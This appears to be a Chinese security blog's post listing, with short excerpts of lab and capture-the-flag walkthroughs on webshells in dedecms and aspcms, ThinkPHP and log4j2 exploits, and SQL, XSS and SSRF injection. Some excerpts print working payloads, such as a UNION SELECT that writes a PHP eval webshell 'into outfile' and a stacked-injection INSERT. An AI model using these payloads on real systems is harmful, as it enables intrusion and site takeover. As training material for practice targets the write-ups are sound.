- 博客(29)
- 收藏
- 关注
原创 使用awvs测试站点并输出漏洞报告教程
2.点击【Targets】--》【Add Targets】新建扫描目标,输入目标网址,点击【Save】开始扫描。1.访问本机3443端口。3.点击【Scans】
2024-09-25 18:31:18
363
原创 aspcms webshell漏洞复现
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
2024-09-17 21:08:26
467
原创 dedecms——四种webshell姿势
步骤二:点击【生成】--》【更新主页HTML】--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化。步骤一:点击 【系统】--》【SQL命令执行工具】 --》【运行SQL命令行】处添加一句话代码--》点击 【确定】步骤一:点击 【模块】--》【广告管理】 --》〔【增加一个新广告】 --》在 【广告内容】处添。步骤二:登陆到后台点击【核心】--》 【文件式管理器】--》 【文件上传】将准备好的一句话代。步骤三:蚁剑连接测试。
2024-09-17 19:37:06
811
原创 sqlgun靶场练习
1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞2.有xss大概率也存在sql注入,测试到3的时候发现有回显3.进一步得出库名4.要get shell的话我们可以尝试写一句话木马进去,构建payloadkey=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile ‘/var/www/html/1.php’#5.访问我们写进去的1.php,确认木马已写入
2024-09-13 13:56:01
693
原创 PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
显示漏洞利用成功,浏览器进行访问,成功复现。端口为:8080,访问网站,搭建成功。
2024-09-08 22:12:27
243
原创 ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。ThinkPHP是一款运用极广的。
2024-09-08 22:04:14
365
原创 vulhub靶场log4j2漏洞复现
action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号。去另外⼀个监控终端看看shell有没有弹回来且⽤whoami 命令查看权限,发现已经成功获取到root权限了。拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。端口开在8983,访问网站,环境搭建成功。
2024-09-08 21:57:48
334
原创 中间件解析漏洞
⼀:IIS解析漏洞⼀:IIS解析漏洞1.1:IIS6.X在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 ,在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码2.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执行3.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意⽂件会被当做asp⽂件去执⾏.
2024-09-05 19:26:25
2102
原创 tomato靶场攻略
1.使用nmap扫描同网段的端口,发现靶机地址2.访问到主页面,只能看到一个大西红柿3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image4.访问我们扫到的地址 ,点金目录里看看有些什么文件5.看到info.php很熟悉,点进去看看6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机
2024-09-04 18:54:19
484
原创 文件包含PHP伪协议利用方法
1.php.ini参数设置在 php.ini ⾥有两个重要的参数;:默认值是 ON。允许 url ⾥的封装协议访问⽂件;:默认值是 OFF,改为On。不允许包含 url ⾥的封装协议包含⽂件;2.file://协议使⽤:file://⽂件的绝对路径和⽂件名。
2024-09-03 20:37:53
196
原创 hackme靶机通关攻略
1.先进行端口扫面,扫面和我们同一网段的靶机2.找出靶机的ip3.看看他有些什么目录4.访问这些文件后我们先创建一个账户并登录5.登录后输入sql语句' or 1=1#获得下图数据6.再输入1进行抓包7.用sqlmap验证是否存在sql注入sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" -- cookie="PHPSESSID=gnpfr7rt8kbfco8383t
2024-09-03 18:55:09
1170
原创 sqli-labs靶场通关攻略(41-60)
第四十一关联合查询爆出数据库但这关考察的时堆叠注入 ,我们给他注入一条数据输入id=50即可查到我们注入的数据第四十二关看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。login_user=1&login_password=1';insert into users(id,user
2024-08-28 19:06:55
998
原创 CTFhub-SSRF 详解
今天我们来做一下ctfhub靶场中的SSRF1.首先我们来到内网访问根据提示我们访问http://127.0.0.1/flag.php,复制flag粘贴即可2.我们来到伪协议读取文件进入页面,先按上一关的地址来访问 ,发现访问不到然后想到我们linux的根目录在var/www/html/flag.php ,输入按F12打开源代码即可得到flag3.端口扫描打开页面是这样的题目介绍我们的端口在8000-9000,由于端口太多得借助工具,我们访问后
2024-08-27 21:32:47
1234
原创 【xss-labs-master】靶场通关详解(持续更新中...)
XSS(Cross-site Scripting),中⽂名跨站脚本攻击。其原理是攻击者利⽤浏览器执⾏前端代码(HTML、CSS、JavaScript)的特性,将恶意的JavaScript代码插⼊到⻚⾯中,当⽤户浏览⻚XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意。
2024-08-25 23:26:00
610
原创 ACCESS⼿⼯注⼊
启动iis服务器 并浏览根⽬录 将压缩包解压到根⽬录下⾯,这个压缩包是我们需要搭建⽹站的压缩包,将这个压缩包解压到⽹站根⽬录下,获得⼀堆⽂件夹 我们环境所需要的是1111⽂件夹 将1111⽂件夹⾥⾯的所有东⻄放到根⽬录下⾯,最终如下图。步骤⼆:order by判断列数 当order by 7的时候⻚⾯正常 order by 8的时候⻚⾯报错 说明有7个字段。步骤六:密码进⾏md5解密 并去后台登录 后台地址爆破⼀下。表中查询数据,⻚⾯正常,说明查到数据了。打开⽹⻚判断是否存在注⼊。正常,说明存在这⼀列。
2024-08-20 20:32:44
332
原创 MongoDB⼿⼯注⼊
成功显示“1”和“2”。可以在此来显示想要查询的数据。接下来开始尝试构造payload查询。最终我们就可以获得数据了,将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下。得到数据库名之后就可以尝试爆出数据库下的表名了且构造Payload...其中。json型数据,db为取当前数据库,即当前的数据库为。最后我们就可以直接选取某个表爆出其中的数据了...返回⼀个包含当前数据库中所有集合名称的数组。通过回显观察到数据库为。其中tojson是可以把数据变成。端就可以看到KEY了。步骤⼀:构造回显测试。
2024-08-20 20:12:30
201
原创 Oracle⼿⼯注⼊
步骤三:获取显错点,联合查询这⾥使⽤了union select,oracle数据库与mysql数据库不同点在于它对 于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段使⽤字符型数据,整型字段使⽤整型数据才可以。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断。步骤六:查询数据库表名,查询表名⼀般查询admin或者user表。步骤九:对其数据库内的字段内容进⾏解密....进⾏后台登录。步骤五:查询当前数据库库名。
2024-08-20 19:57:42
2225
原创 MSSQL⼿⼯注⼊
步骤⼆:可通过以下Payload来探测当前站点是否是MSSQL数据库,正常执⾏说明后台数据库是。步骤⼀:在第⼀关使⽤单双引号判断是否存在注⼊,根据报错的回显可知数据类型为字符型。步骤三:通过以下语句来猜解有哪些表...从⽽获取⽬标站点的表信息...也可根据⻚⾯报错信息来判断数据库。步骤六:通过以下语句爆出表下的所有字段信息。返回结果为空,说明不知道第五张表。
2024-08-20 19:34:51
253
原创 SQL手工注入漏洞测试攻略
开始猜解后端收据库能够返回多少个字段..发现order by 5的时候没有数据回显,order。此时我们已经得到了表并开始查询字段,由于查询到的第⼆个表名带有“user”,我们就先。开始检测这4个字段当中哪些字段可以被前端显示出来且使⽤union 查询来构造。在这两个字段当中来查询我们想要的得到的数据。by 3和4 有回显数据,所以后端返回到前端的数据字段数为4个。步骤五:构造Payload爆指定数据库下的表名....步骤⼀:查看是否存在注⼊点...构造Payload;端数据库查询语句当中...
2024-08-20 19:16:59
393
原创 AI-web 1.0靶机详解
用工具扫出靶机存在的端口后,对网站的目录进行扫描出现robots.txt文件,进入网站进行查询访问上方目录发现没有权限用dirsearch扫描,发现有info.php文件在浏览器访问info,可找到靶机根目录访问下方目录也不行删除uploads发现可以访问到使用dirsearch扫描和上方访问的是一样的测试闭合'#,存在SQL注入使用Burpsuite进行一个抓包,得到注入点(此处忘了截图,不好意思)使用sqlmap进行扫描
2024-08-19 21:10:51
192
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人